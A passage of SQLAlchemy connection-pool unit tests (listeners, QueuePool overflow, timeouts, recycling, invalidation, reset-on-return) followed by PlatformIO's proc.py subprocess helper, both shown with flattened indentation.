def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1)
def status(pool):
return pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(
tsa.exc.TimeoutError,
p.connect
)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(
target=run_test, args=("success_one", p, False)),
threading.Thread(
target=run_test, args=("success_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_one", p, True)),
threading.Thread(
target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False))
]
for t in threads:
t.start()
time.sleep(.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[call("success_one"), call("success_two"),
call("overflow_two"), call("overflow_three"),
call("overflow_one")]
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter,
args=(p, timeout, max_overflow))
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator,
pool_size=1, timeout=None,
max_overflow=0)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.start()
threads.append(t)
time.sleep(.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(
pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
ConnectionFairy with an ambiguous counter. i.e. its not true
reference counting."""
p = self._queuepool_fixture(
pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
with patch("sqlalchemy.pool.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0,
recycle=30)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(
pool_size=1,
max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
time.sleep(.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record,
pool, ref, echo, fairy=None):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback")
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy)
return patch.object(
pool, '_finalize_fairy', assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(
Exception,
p.connect
)
p._pool.queue = collections.deque(
[
c for c in p._pool.queue
if c.connection is not None
]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[
call.connect(ANY, ANY),
call.checkout(ANY, ANY, ANY)
]
)
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info['x'] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert 'x' in conn_rec.info
assert_raises(
Exception,
p.connect
)
p._pool.queue = collections.deque(
[
c for c in p._pool.queue
if c.connection is not None
]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1,
max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {},
Mock(), Mock())
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn, ))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1,
max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect() # noqa
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1,
use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class ResetOnReturnTest(PoolTestBase):
def _fixture(self, **kw):
dbapi = Mock()
return dbapi, pool.QueuePool(
creator=lambda: dbapi.connect('foo.db'),
**kw)
def test_plain_rollback(self):
dbapi, p = self._fixture(reset_on_return='rollback')
c1 = p.connect()
c1.close()
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_plain_commit(self):
dbapi, p = self._fixture(reset_on_return='commit')
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
def test_plain_none(self):
dbapi, p = self._fixture(reset_on_return=None)
c1 = p.connect()
c1.close()
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_rollback(self):
dbapi, p = self._fixture(reset_on_return='rollback')
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert dbapi.connect().special_rollback.called
assert not dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 1)
eq_(dbapi.connect().special_commit.call_count, 0)
assert dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
def test_agent_commit(self):
dbapi, p = self._fixture(reset_on_return='commit')
class Agent(object):
def __init__(self, conn):
self.conn = conn
def rollback(self):
self.conn.special_rollback()
def commit(self):
self.conn.special_commit()
c1 = p.connect()
c1._reset_agent = Agent(c1)
c1.close()
assert not dbapi.connect().special_rollback.called
assert dbapi.connect().special_commit.called
assert not dbapi.connect().rollback.called
assert not dbapi.connect().commit.called
c1 = p.connect()
c1.close()
eq_(dbapi.connect().special_rollback.call_count, 0)
eq_(dbapi.connect().special_commit.call_count, 1)
assert not dbapi.connect().rollback.called
assert dbapi.connect().commit.called
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect() # noqa
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls(
[
call('foo.db'),
call('foo.db')],
any_order=True)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
def creator():
return dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
class CreatorCompatibilityTest(PoolTestBase):
def test_creator_callable_outside_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator()
finally:
conn.close()
def test_creator_callable_outside_witharg(self):
e = testing_engine()
creator = e.pool._creator
try:
conn = creator(Mock())
finally:
conn.close()
def test_creator_patching_arg_to_noarg(self):
e = testing_engine()
creator = e.pool._creator
try:
# the creator is the two-arg form
conn = creator(Mock())
finally:
conn.close()
def mock_create():
return creator()
conn = e.connect()
conn.invalidate()
conn.close()
# test that the 'should_wrap_creator' status
# will dynamically switch if the _creator is monkeypatched.
# patch it with a zero-arg form
with patch.object(e.pool, "_creator", mock_create):
conn = e.connect()
conn.invalidate()
conn.close()
conn = e.connect()
conn.close()
|
proc.py
|
# Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import subprocess
import sys
from contextlib import contextmanager
from threading import Thread
from platformio import exception
from platformio.compat import (
IS_WINDOWS,
get_filesystem_encoding,
get_locale_encoding,
string_types,
)
class AsyncPipeBase(object):
def __init__(self):
self._fd_read, self._fd_write = os.pipe()
self._pipe_reader = os.fdopen(
self._fd_read, encoding="utf-8", errors="backslashreplace"
)
self._buffer = ""
self._thread = Thread(target=self.run)
self._thread.start()
def get_buffer(self):
return self._buffer
def fileno(self):
return self._fd_write
def run(self):
try:
self.do_reading()
except (KeyboardInterrupt, SystemExit, IOError):
self.close()
def do_reading(self):
raise NotImplementedError()
def close(self):
self._buffer = ""
os.close(self._fd_write)
self._thread.join()
class BuildAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback, data_callback):
self.line_callback = line_callback
self.data_callback = data_callback
super(BuildAsyncPipe, self).__init__()
def do_reading(self):
line = ""
print_immediately = False
for char in iter(lambda: self._pipe_reader.read(1), ""):
self._buffer += char
if line and char.strip() and line[-3:] == (char * 3):
print_immediately = True
if print_immediately:
# leftover bytes
if line:
self.data_callback(line)
line = ""
self.data_callback(char)
if char == "\n":
print_immediately = False
else:
line += char
if char != "\n":
continue
self.line_callback(line)
line = ""
self._pipe_reader.close()
class LineBufferedAsyncPipe(AsyncPipeBase):
def __init__(self, line_callback):
self.line_callback = line_callback
super(LineBufferedAsyncPipe, self).__init__()
def do_reading(self):
for line in iter(self._pipe_reader.readline, ""):
self._buffer += line
self.line_callback(line)
self._pipe_reader.close()
def exec_command(*args, **kwargs):
result = {"out": None, "err": None, "returncode": None}
default = dict(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
default.update(kwargs)
kwargs = default
with subprocess.Popen(*args, **kwargs) as p:
try:
result["out"], result["err"] = p.communicate()
result["returncode"] = p.returncode
except KeyboardInterrupt:
raise exception.AbortedByUser()
finally:
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
kwargs[s].close() # pylint: disable=no-member
for s in ("stdout", "stderr"):
if isinstance(kwargs[s], AsyncPipeBase):
result[s[3:]] = kwargs[s].get_buffer() # pylint: disable=no-member
for key, value in result.items():
if isinstance(value, bytes):
try:
result[key] = value.decode(
get_locale_encoding() or get_filesystem_encoding()
)
except UnicodeDecodeError:
result[key] = value.decode("latin-1")
